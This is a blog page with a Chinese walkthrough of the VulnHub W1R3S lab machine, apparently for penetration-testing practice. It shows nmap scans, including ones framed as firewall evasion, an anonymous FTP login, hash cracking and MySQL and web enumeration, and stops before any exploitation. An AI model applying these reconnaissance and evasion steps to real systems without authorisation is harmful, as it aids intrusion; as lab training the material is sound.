<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>我的技术与生活——W1R3S | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="shortcut icon" href="/imgs/shortcut-icon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/public.css" />
  <link rel="stylesheet" href="/css/layout.css" />
  <link rel="stylesheet" href="/css/iconfont.css" />
  <link rel="stylesheet" href="/css/APlayer.min.css" />
  <script src="/js/APlayer.min.js"></script>
  <script src="/js/jquery.min.js"></script>
  <script src="/js/jquery.pjax.min.js"></script>

  <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
  <script>
    document.title = `我的技术与生活——W1R3S`
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>

<style>
  .load {
    width: 100%;
    height: 100vh;
    background-color: rgb(37, 35, 40);
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    position: relative;
    z-index: 9999;
  }
  .load-circle {
    width: 80px;
    height: 80px;
    border: 8px solid orange;
    border-bottom-color: transparent;
    border-radius: 50%;
    display: flex;
    justify-content: center;
    align-items: center;
    animation: rotate 1s linear infinite;
    filter: drop-shadow(0 0 3px orange);
  }
  .load-circle-inner {
    width: 40px;
    height: 40px;
    border: 8px solid orange;
    border-top-color: transparent;
    border-radius: 50%;
    animation: rotate-reverse .5s linear infinite;
  }
  .load-text {
    margin-top: 20px;
    font-size: 24px;
    color: orange;
    display: flex;
  }
  .load-text span {
    margin: 0 5px;
    text-shadow: 5px 5px 5px orange;
    animation: move 1s linear infinite;
  }
  .load-text span:nth-child(1) {
    animation-delay: -0.6s;
  }
  .load-text span:nth-child(2) {
    animation-delay: -0.5s;
  }
  .load-text span:nth-child(3) {
    animation-delay: -0.4s;
  }
  .load-text span:nth-child(4) {
    animation-delay: -0.3s;
  }
  .load-text span:nth-child(5) {
    animation-delay: -0.2s;
  }
  .load-text span:nth-child(6) {
    animation-delay: -0.1s;
  }
  @keyframes rotate {
    0% { transform: rotate(0); }
    100% { transform: rotate(360deg); }
  }
  @keyframes rotate-reverse {
    0% { transform: rotate(0); }
    100% { transform: rotate(-360deg); }
  }
  @keyframes move {
    0% { transform: translateY(0%) rotate(0) scale(1); }
    20% { transform: translateY(20%) rotate(10deg) scale(1.2); }
    80% { transform: translateY(-10%) rotate(-20deg) scale(.8);}
    100% { transform: translateY(0) rotate(0) scale(1); }
  }

  .progress {
    position: fixed;
    left: 0; top: 0;
    width: 0;
    height: 3px;
    background-color: green;
    transition: all cubic-bezier(0.215, 0.610, 0.355, 1) .1s;
    z-index: 9999;
  }

  .to-up {
    animation: toUp .5s 1;
  }
  .gray {
    position: fixed;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    z-index: 9999;
    display: none;
    pointer-events: none;
    background-color: #000;
    mix-blend-mode: color;
  }
  @keyframes toUp {
    from { transform: translateY(15px); opacity: 0; }
    to { transform: translateY(0) ; opacity: 1; }
  }
</style>
<body>
  <div id="load" class="load">
    <div class="load-circle">
      <div class="load-circle-inner"></div>
    </div>
    <p class="load-text">
      <span>L</span>
      <span>O</span>
      <span>A</span>
      <span>D</span>
      <span>I</span>
      <span>N</span>
      <span>G</span>
    </p>
  </div>
  <div id="container" class="container w-100 vh-100" style="display: none;">
    <header class="header">
  <div class="header-wrapper">
    <div class="header-left">
      <div class="header-search">
        <input id="search-input" type="text" class="header-search--input" placeholder="请输入要检索的文章标题" />
        <span id="search-btn" class="header-search--icon"><i class="iconfont icon-sousuo"></i></span>
      </div>
      <div id="search-layer" class="header-search--layer hidden">
        <p class="title">
          <span>以下是搜索内容：</span>
          <span id="close-layer-btn">关闭</span>
        </p>
        <ul>
        </ul>
      </div>
    </div>
    <div class="header-right">
      <ul class="header-menu">
        <li>
          <a href="http://example.com/">
            <i class="header-menu--icon iconfont icon-shouye"></i>
            <span class="header-menu--span">首页</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/log">
            <i class="header-menu--icon iconfont icon-rizhi"></i>
            <span class="header-menu--span">日志</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/link">
            <i class="header-menu--icon iconfont icon-youqinglianjie"></i>
            <span class="header-menu--span">友情链接</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/about">
            <i class="header-menu--icon iconfont icon-guanyuwomen"></i>
            <span class="header-menu--span">关于我</span>
          </a>
        </li>
      </ul>
    </div>
  </div>
</header>

<script>
  const ipt = document.querySelector('#search-input')
  const btn = document.querySelector('#search-btn')
  const layer = document.querySelector('#search-layer')
  const posts = JSON.parse(`[{"title":"Hello World","path":"2026/03/13/hello-world/"},{"title":"W1R3S","path":"2026/03/13/W1R3S/"},{"title":"W","path":"2026/03/13/W/"},{"title":"W1R3S-github图床+","path":"2026/03/13/W1R3S-github图床/"},{"title":"W1R3S-github图床 (restored 1773387147466)","path":"2026/03/13/W1R3S-github图床 (restored 1773387147466)/"},{"title":"aaa","path":"2026/03/13/aaa/"}]`)
  ipt.addEventListener('keyup', e => {
    if (e.key === 'Enter') {
      handleSearch()
    }
  })
  btn.addEventListener('click', () => {
    handleSearch()
  })

  document.querySelector('#close-layer-btn').addEventListener('click', () => {
    layer.classList.toggle('hidden')
  })

  function handleSearch() {
    if (ipt.value.trim() === '') {
      return
    }
    let html = ''
    const targetPosts = posts.filter(post => post.title.includes(ipt.value))
    targetPosts.forEach(post => {
      html += `
        <li>
          <div>
            <a href="/${post.path}">${post.title.replace(new RegExp(ipt.value), `<span>${ipt.value}</span>`)}</a>
          </div>
          <img src="${post.cover || '/imgs/default-cover.webp' }" />
        </li>
      `
    })
    if (html.trim () === '') {
      html += '<p class="empty">没有搜索到内容</p>'
    }
    layer.querySelector('ul').innerHTML = html
    layer.classList.remove('hidden')
  }
</script> 
    <section id="main" class="main">
      <div class="main-left-wrapper">
<div class="main-left">
  <div class="main-left--block">
    <div class="main-left--info">
      <img src="/imgs/avatar.jpg"" class="main-left--avatar" />
      <div class="main-left--intro">
        <p class="main-left--name">lmlsama</p>
        <div class="main-left--tags">
          <span class="main-left--tag">kong</span>
          <span class="main-left--tag"></span>
        </div>
      </div>
    </div>
  
    <div>
      <div class="main-left--motto">
        <p>“井底之蛙，虽不曾见过大海”</p>
        <p>“但知晓天之湛蓝”</p>
      </div>
      <div class="main-left--github">
        <span class="line"></span>
        <a target="_blank" rel="noopener" href="https://github.com/LMLsama/LMLsama.github.io"><i class="logo iconfont icon-github-fill"></i></a>
        <span class="line"></span>
      </div>
      <div class="main-left--statics">
        <a href="/categories">
          <div>
            <span>0</span>
            <span>分类</span>
          </div>
        </a>
        <a href="/tags">
          <div>
            <span>0</span>
            <span>标签</span>
          </div>
        </a>
        <a href="/archives">
          <div>
            <span>1 </span>
            <span>归档</span>
          </div>
        </a>
      </div>
    </div>
  </div>

  <div class="main-left--block">
    <ul class="main-left--menu">
      
        <li>
          <a href="/">
            <span class="header-menu--span">小站首页</span>
            <i class="header-menu--icon iconfont icon-shouye"></i>
          </a>
        </li>
      
        <li>
          <a href="/log">
            <span class="header-menu--span">个人日志</span>
            <i class="header-menu--icon iconfont icon-rizhi"></i>
          </a>
        </li>
      
        <li>
          <a href="/link">
            <span class="header-menu--span">友情链接</span>
            <i class="header-menu--icon iconfont icon-youqinglianjie"></i>
          </a>
        </li>
      
        <li>
          <a href="/about">
            <span class="header-menu--span">关于自己</span>
            <i class="header-menu--icon iconfont icon-guanyuwomen"></i>
          </a>
        </li>
      
        <li>
          <a href="/tools">
            <span class="header-menu--span">我的工具</span>
            <i class="header-menu--icon iconfont icon-gongju"></i>
          </a>
        </li>
      
    </ul>
  </div>

  <div class="main-left--block">
    <div class="main-left--site">
      <h5 class="main-left--title">
        <span>站点信息</span>
        <i class="iconfont icon-zhandian"></i>
      </h5>
      <p class="main-left--subtitle">
        <span>文章数目：</span>
        <span>6 篇</span>
      </p>
      <p class="main-left--subtitle">
        <span>最近动态：</span>
        <span>今天</span>
      </p>
      <p class="main-left--subtitle">
        <span>上线时间：</span>
        <span>1487天</span>
      </p>
      <p class="main-left--subtitle">
        <span>当前版本：</span>
        <span>v1.0.2</span>
      </p>
    </div>
  </div>
</div></div>
      <div id="main-container" class="main-container">


  <link rel="stylesheet" href="/css/partial/article.css" />

<div class="article-container">
  <div class="article">
    <h1 class="article-title">W1R3S</h1>
    <div class="article-info">
      <div class="article-info--item">
        <div class="article-info--info">
          
          <div class="article-info--categories">
            <span>分类：</span>
            
          </div>
          
          
          <div class="article-info--tags">
            <span>标签：</span>
            
          </div>
          
          <p class="article-info--date">日期：2026-03-13 13:05:26</p>
        </div>
        <img src="/imgs/default-cover.webp" alt="" class="article-cover">
      </div>
    </div>
    <article class="article-content markdown-body">
      <h1 id="W1R3S-1-0-1"><a href="#W1R3S-1-0-1" class="headerlink" title="W1R3S 1.0.1"></a>W1R3S 1.0.1</h1><blockquote>
<p><strong>[!CAUTION]</strong></p>
<p><strong>注意边做边记录！</strong></p>
</blockquote>
<h3 id="靶机下载"><a href="#靶机下载" class="headerlink" title="靶机下载"></a>靶机下载</h3><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/w1r3s-101,220/">https://www.vulnhub.com/entry/w1r3s-101,220/</a></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131451992.png" alt="image-20260303180715434"></p>
<p><strong>本机（攻击机）IP</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131451993.png" alt="image-20260303180942436"></p>
<h2 id="一，nmap-扫描与分析"><a href="#一，nmap-扫描与分析" class="headerlink" title="一，nmap 扫描与分析"></a>一，nmap 扫描与分析</h2><h3 id="隐蔽性原则"><a href="#隐蔽性原则" class="headerlink" title="隐蔽性原则"></a>隐蔽性原则</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/2302_80189643/article/details/139297137">kali 渗透测试——Nmap 扫描补充（绕过防火墙）_nmap 绕过防火墙扫描-CSDN 博客</a></p>
<h3 id="1-探测存活主机"><a href="#1-探测存活主机" class="headerlink" title="1.探测存活主机"></a>1.探测存活主机</h3><p><strong>探测目标主机，扫描整个 C 段</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -sn 192.168.168.0/24</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131451994.png" alt="image-20260303181450105"></p>
<blockquote>
<p><em>-sn</em> 相当于是 <strong>Ping 扫描</strong>，其核心功能是通过发送探测数据包来判断目标主机是否在线，而不会进一步探测端口状态。</p>
<p><strong>ping 扫描，允许轻量级的入侵而不被注意，知道有多少主机可用状态</strong></p>
</blockquote>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131451995.png" alt="image-20260303182722823"></p>
<p>**目标主机为 **<code>192.168.168.138</code></p>
<h3 id="2-端口扫描（发现哪些端口是开放的-默认-TCP）"><a href="#2-端口扫描（发现哪些端口是开放的-默认-TCP）" class="headerlink" title="2 端口扫描（发现哪些端口是开放的&#x2F;默认 TCP）"></a>2 端口扫描（发现哪些端口是开放的&#x2F;默认 TCP）</h3><p><strong>这里我演示</strong></p>
<p>** **<code>SYN扫描（也称半开扫描）来减少防火墙检测到的可能性。SYN扫描只发送SYN包，不完成整个TCP握手过程。</code> <code>方法：nmap -sS &lt;目标IP地址&gt;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -sS -p- 192.168.168.138</span><br></pre></td></tr></table></figure>

<p><code>-p-</code> 代表探测所有端口（默认 TCP）</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131451996.png" alt="image-20260303183944726"></p>
<blockquote>
<p><strong>扫描出的端口：</strong></p>
<p><strong>21 ftp</strong></p>
<p><strong>22 ssh</strong></p>
<p><strong>80 http</strong></p>
<p><strong>3306 mysql</strong></p>
</blockquote>
<p><code>nmap -f &lt;目标IP地址&gt;</code> <code>通过将数据包分割成更小的部分发送，使得防火墙更难识别这些数据包属于一个扫描流量。</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -f -p- 192.168.168.138</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131451997.png" alt="image-20260303183958558"></p>
<p><strong>这些扫描结果普遍相对较慢</strong></p>
<p><strong>当然也可以手动****调节扫描速度</strong></p>
<blockquote>
<p><code>--min-rate 10000</code> 这个参数的意思是：<strong>Nmap 发送数据包的速度</strong>不低于 <strong>每秒 10000 个</strong>。</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap --min-rate=10000 -p- 192.168.168.138</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131451998.png" alt="image-20260303184516517"></p>
<p><strong>速度快很多，但动静相对更大，这是靶机没有</strong><code>waf</code></p>
<h3 id="3-UDP-扫描"><a href="#3-UDP-扫描" class="headerlink" title="3,UDP 扫描"></a>3,UDP 扫描</h3><p><strong>也是必不可少的扫描项之一</strong></p>
<p>**跟默认 TCP 相比，多一个 **<code>-sU</code> 参数</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131451999.png" alt="image-20260303184806314"></p>
<p><strong>发现仅存的 3306 端口关闭状态，可以不用管 UDP 端口</strong></p>
<h3 id="4-详细信息扫描（重中之重）"><a href="#4-详细信息扫描（重中之重）" class="headerlink" title="4,详细信息扫描（重中之重）"></a>4,详细信息扫描（重中之重）</h3><p><strong>每一个端口能扫出什么信息，根据信息确定攻击面和渗透的优先级</strong></p>
<p><strong>先看命令</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.168.138</span><br></pre></td></tr></table></figure>

<p><strong><code>-sT</code> (TCP Connect 扫描)</strong>	<strong>这是 TCP 全连接扫描。它会完整地完成 TCP 三次握手（SYN -&gt; SYN&#x2F;ACK -&gt; ACK），然后立即断开连接。</strong></p>
<p><strong><code>-sV</code> (版本探测)</strong>	<strong>探测端口上运行的服务版本。</strong></p>
<p><strong><code>-sC</code> (使用默认脚本)</strong>	<strong>调用 Nmap 自带的标准脚本库（位于</strong><code>default</code> 类别）对目标进行探测。</p>
<p><strong><code>-O</code> (操作系统指纹识别)</strong>	<strong>尝试识别目标主机的操作系统。</strong></p>
<p><strong>日常打靶足够了</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452000.png" alt="image-20260303185525626"></p>
<p>** 分析攻击方向**</p>
<p><strong>21&#x2F;tcp (FTP - vsftpd 3.0.3)</strong> <code>Anonymous FTP login allowed</code> (匿名登录允许)**		**<strong>最重要最优先！</strong></p>
<p><strong>22&#x2F;open ssh</strong> 我们要连接 ssh 很难，没有用户名也没有密码，只能枚举，<strong>几乎不考虑</strong></p>
<p><strong>80&#x2F;tcp</strong> Web 根目录显示：<code>Apache2 Ubuntu Default Page</code> (Apache 默认首页)。具体版本号 Apache 2.4.18 可能存在信息泄露或 mod_http2 拒绝服务，但很难直接拿 shell。重点在于<strong>目录扫描</strong>，看是否存在隐藏目录或备份文件。</p>
<p><strong>3306&#x2F;tcp (MySQL)</strong> 状态显示 <code>unauthorized</code>。这意味着 MySQL 不允许从你的 IP (192.168.168.130) 进行远程连接，或者禁止空密码登录。除非找到数据库凭证，否则无法直接利用。</p>
<p><strong>系统为</strong><code>Ubuntu</code></p>
<h3 id="5-漏洞脚本的扫描（六分钟左右）"><a href="#5-漏洞脚本的扫描（六分钟左右）" class="headerlink" title="5.漏洞脚本的扫描（六分钟左右）"></a>5.漏洞脚本的扫描（六分钟左右）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap --script=vuln -p21,22,80,3306 192.168.168.138</span><br></pre></td></tr></table></figure>

<p><strong>脚本使用总结</strong></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/441216448"> Nmap 脚本使用总结（看这一篇就够了） - 知乎</a></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452001.png" alt="image-20260303195536906"></p>
<p>**DOS 攻击不考虑，这里最重要的是找到了 **<code>Wordpress login page</code> 这个字段</p>
<p><img src="https://ps.w.org/apppresser/trunk/screenshot-1.png?rev=3416300" alt="img"></p>
<blockquote>
<p><strong>先了解什么是 CMS？</strong></p>
<p><strong>CMS</strong> 是 <strong>Content Management System</strong>（内容管理系统）的缩写。</p>
<p><strong>简单来说，它是一个****让你不用写代码就能管理网站内容的软件</strong>。就像你使用 WordPress 写博客，不需要懂 HTML、CSS 或 PHP，直接输入文字、上传图片就能发布文章——这就是 CMS 的作用。</p>
<p><strong>通常包括下面三个部分</strong></p>
<h3 id="1-内容管理应用（前台）"><a href="#1-内容管理应用（前台）" class="headerlink" title="1. 内容管理应用（前台）"></a>1. <strong>内容管理应用（前台）</strong></h3><p><strong>用户看到的部分：</strong></p>
<ul>
<li><strong>文章页面</strong></li>
<li><strong>图片展示</strong></li>
<li><strong>评论区</strong></li>
<li><strong>导航菜单</strong></li>
</ul>
<h3 id="2-内容管理应用（后台）"><a href="#2-内容管理应用（后台）" class="headerlink" title="2. 内容管理应用（后台）"></a>2. <strong>内容管理应用（后台）</strong></h3><p><strong>管理员使用的控制面板：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://yoursite.com/admin</span><br><span class="line">或</span><br><span class="line">http://yoursite.com/wp-admin  (WordPress)</span><br></pre></td></tr></table></figure>

<p><strong>在这里可以：</strong></p>
<ul>
<li><strong>发布&#x2F;编辑文章</strong></li>
<li><strong>管理用户权限</strong></li>
<li><strong>更换网站主题</strong></li>
<li><strong>安装插件</strong></li>
</ul>
<h3 id="3-数据库"><a href="#3-数据库" class="headerlink" title="3. 数据库"></a>3. <strong>数据库</strong></h3><p><strong>存储所有内容的仓库：</strong></p>
<ul>
<li><strong>文章内容</strong></li>
<li><strong>用户账号密码</strong></li>
<li><strong>网站设置</strong></li>
<li><strong>评论数据</strong></li>
</ul>
<p><strong>为什么重要？</strong></p>
<h3 id="对渗透测试者：攻击面广"><a href="#对渗透测试者：攻击面广" class="headerlink" title="对渗透测试者：攻击面广"></a><strong>对渗透测试者：攻击面广</strong></h3><p><strong>因为 CMS 是通用软件，所以：</strong></p>
<ol>
<li><strong>漏洞公开</strong><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 比如WordPress某个版本有SQL注入</span><br><span class="line"># 全世界所有用这个版本的网站都有这个洞</span><br></pre></td></tr></table></figure></li>
<li><strong>指纹识别容易</strong><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 通过特定文件识别CMS类型</span><br><span class="line">curl http://target.com/wp-content/  # WordPress</span><br><span class="line">curl http://target.com/administrator/ # Joomla</span><br><span class="line">curl http://target.com/sites/default/files/ # Drupal</span><br></pre></td></tr></table></figure></li>
<li><strong>插件是薄弱环节</strong><ul>
<li><strong>很多网站更新 CMS 核心，但忘了更新插件</strong></li>
<li><strong>第三方插件质量参差不齐</strong></li>
</ul>
</li>
<li><strong>默认配置漏洞</strong><ul>
<li><strong>默认管理员账号（admin）</strong></li>
<li><strong>默认后台路径</strong></li>
<li><strong>默认数据库前缀</strong></li>
</ul>
</li>
</ol>
</blockquote>
<h3 id="6-IPv6-扫描"><a href="#6-IPv6-扫描" class="headerlink" title="6.IPv6 扫描"></a>6.IPv6 扫描</h3><h5 id="IOXIDResolver-工具：发现该-IPv4-的网卡有没有-IPv6-开放"><a href="#IOXIDResolver-工具：发现该-IPv4-的网卡有没有-IPv6-开放" class="headerlink" title="IOXIDResolver 工具：发现该 IPv4 的网卡有没有 IPv6 开放"></a>IOXIDResolver 工具：发现该 IPv4 的网卡有没有 IPv6 开放</h5><p><strong>可以 v4 扫 v6</strong></p>
<p><strong>也可以 v6 扫 v4</strong></p>
<p><strong>本质上是爆出全部的 IPv4 和 IPv6 信息</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452002.png" alt="image-20251020195326047"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget https://github.com/mubix/IOXIDResolver/blob/a2e2e933a882c3f63d800465d01cb0207f63487e/IOXIDResolver.py</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452003.png" alt="image-20260303201804526"></p>
<p><strong>给它权限****读 (r)</strong>、<strong>写 (w)</strong> 和 <strong>执行 (x)</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo chmod +x IOXIDResolver.py</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452004.png" alt="image-20260303202135733"></p>
<p><strong>查看帮助，他只有一种命令-t</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python3 IOXIDResolver.py --help</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452005.png" alt="image-20260303203712438"></p>
<p><strong>尝试查找靶机是否有 IP v6 地址</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python3 IOXIDResolver.py -t 192.168.168.138</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452006.png" alt="image-20260303204048796"></p>
<p><strong>没有我们就不管他了</strong></p>
<blockquote>
<p><strong>其他相似工具：</strong></p>
<p>**Windows 下的工具   chisel sshuttle    隧道工具        **</p>
<p><strong>snmpwalk 工具（简单网络管理协议 枚举） 自己加个筛选器就可以筛选出 IPv6 了</strong></p>
</blockquote>
<h2 id="二，FTP-渗透–匿名登陆"><a href="#二，FTP-渗透–匿名登陆" class="headerlink" title="二，FTP 渗透–匿名登陆"></a>二，FTP 渗透–匿名登陆</h2><h3 id="1-ftp-连接靶机"><a href="#1-ftp-连接靶机" class="headerlink" title="1.ftp 连接靶机"></a>1.ftp 连接靶机</h3><p><strong>因为我们 nmap 发现靶机存在 ftp 匿名登陆，那么我们就 ftp 连接靶机</strong></p>
<p><strong>然后会询问你登录名称（ftp 匿名登陆的用户名都是 anoymous）输入</strong></p>
<p><strong>然后密码直接为空，什么都不用填，回车</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452007.png" alt="image-20260303204418372"></p>
<p><strong>查看 ftp 系统命令</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452008.png" alt="image-20260303204553459"></p>
<h3 id="2-发现目录下的文件并全部下载"><a href="#2-发现目录下的文件并全部下载" class="headerlink" title="2.发现目录下的文件并全部下载"></a>2.发现目录下的文件并全部下载</h3><blockquote>
<p><strong>[!NOTE]</strong></p>
<p><strong>1.binary mode 提示用二进制模式传输文件</strong></p>
<p><strong>先输入 binary 切换到二进制模式（好习惯，否则下载下来的文件可能会损坏）</strong></p>
<p><strong>2.先关闭交互模式命令 prompt （否则多个文件下载都要求你确认）</strong></p>
</blockquote>
<p><strong>看到包含的几个目录，转到 content 目录下，发现有三个文件，尝试下载</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452009.png" alt="image-20260303204817849"></p>
<p><strong>然后返回上级目录 cd ..   然后看第二个目录 docs</strong>	<strong>发现只有一个文件</strong>	<strong>下载</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452010.png" alt="image-20260303204911128"></p>
<p><strong>最后下载最后一个目录下的文件</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452011.png" alt="image-20260303205019611"></p>
<h3 id="3-查看各个文件的内容进行逐个分析"><a href="#3-查看各个文件的内容进行逐个分析" class="headerlink" title="3.查看各个文件的内容进行逐个分析"></a>3.查看各个文件的内容进行逐个分析</h3><p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452012.png" alt="image-20260303205208493"></p>
<p><strong>W1R3S 即 WIRES —–leetspeak（解决的是申请名重复的问题，可以查一下减少渗透过程的陌生感）</strong></p>
<p><strong>new 新建立的 ftp 服务器的 有线 配置文件 —刚建的可能会有什么问题（思考—比如默认密码，弱口令…）</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452013.png" alt="image-20260303205300735"></p>
<p><strong>如何判断是什么类型的字符串：</strong></p>
<p><strong>1.感觉-md5 加密</strong></p>
<p><strong>2.hash-identifier  会告诉你可能的加密算法</strong>	<strong>这里看到最可能是 MD5</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452014.png" alt="image-20260303205633506"></p>
<p><strong>3.直接放网页上搜，看提示</strong></p>
<p><strong>这里尝试破解，先考虑 kali 上的</strong><strong><code>john</code></strong></p>
<p><strong>先用 vim 写入到新建的</strong><code>md5.txt</code> 文件中，然后丢给 john</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452015.png" alt="image-20260303210553688"><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452016.png" alt="image-20260303210614814"></p>
<p><strong>这里看到解密失败了，但并不是说</strong><code>john</code> 不好用,而是这个密文有点特殊</p>
<p><strong>网上搜网站–国际版 bing 搜</strong>	<strong>“md5 cracker”</strong></p>
<p><a target="_blank" rel="noopener" href="https://hashes.com/en/decrypt/hash">Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online</a></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452017.png" alt="image-20260303210314330"></p>
<p><strong>可惜的是这并不是有用信息</strong></p>
<p><strong>看下面一行</strong><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452018.png" alt="image-20260303211026665">的 类似于 base64 编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;SXQgaXMgZWFzeSwgYnVOIG5vdCBOaGFOIGVhc3kuLg==&quot; | base64 -d</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452019.png" alt="image-20260303211215676"></p>
<p><strong>还是没用</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452020.png" alt="image-20260303205314446"></p>
<p><strong>这个是一串用****ascii 码</strong>写的 banner</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452021.png" alt="image-20251022173318670"></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452022.png" alt="image-20251022173234455"></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452023.png" alt="image-20251022173357076"></p>
<p><strong>其他.txt 文件中  看到有该公司的工作人员（角色的信息&#x2F;功能）   （思路！）</strong></p>
<p><strong>manager：可能有基于业务的高权限，所有人员的数据…</strong></p>
<p><strong>IT Dept：基于技术的高权限，系统权限…</strong></p>
<p><strong>Human Resources：相关人员的最详细信息…</strong></p>
<p><strong>可能可以根据这些人员进行字典爆破，</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452024.png" alt="image-20260303211507581"></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452025.png" alt="image-20260303211633097"></p>
<p><strong>可以看到</strong><code>ftp</code> 中并没有什么有效信息</p>
<h2 id="三，看一下-3306-MySQL"><a href="#三，看一下-3306-MySQL" class="headerlink" title="三，看一下 3306 MySQL"></a>三，看一下 3306 MySQL</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -h 192.168.168.138 -u=root -p=123456</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong><code>-h</code></strong> &#x3D; <strong>host</strong>（主机） 指定要连接的 MySQL 服务器 IP 地址</p>
<p>**如果连接本机数据库，可省略 **<code>-h</code> 或使用 <code>-h localhost</code></p>
<p><strong><code>-u</code></strong> &#x3D; <strong>user</strong>（用户）**		****<code>-p</code>** &#x3D; <strong>password</strong>（密码）</p>
</blockquote>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452026.png" alt="image-20260304182812409"></p>
<p><strong>发现本机 IP 不允许连接它的数据库</strong></p>
<h2 id="四，web-渗透"><a href="#四，web-渗透" class="headerlink" title="四，web 渗透"></a>四，web 渗透</h2><h3 id="80-端口"><a href="#80-端口" class="headerlink" title="80 端口"></a>80 端口</h3><p><strong>打开浏览器，看看这个 IP 跑的什么服务</strong></p>
<p><strong>可以看看有没有什么信息</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452027.png" alt="image-20260304183430792"></p>
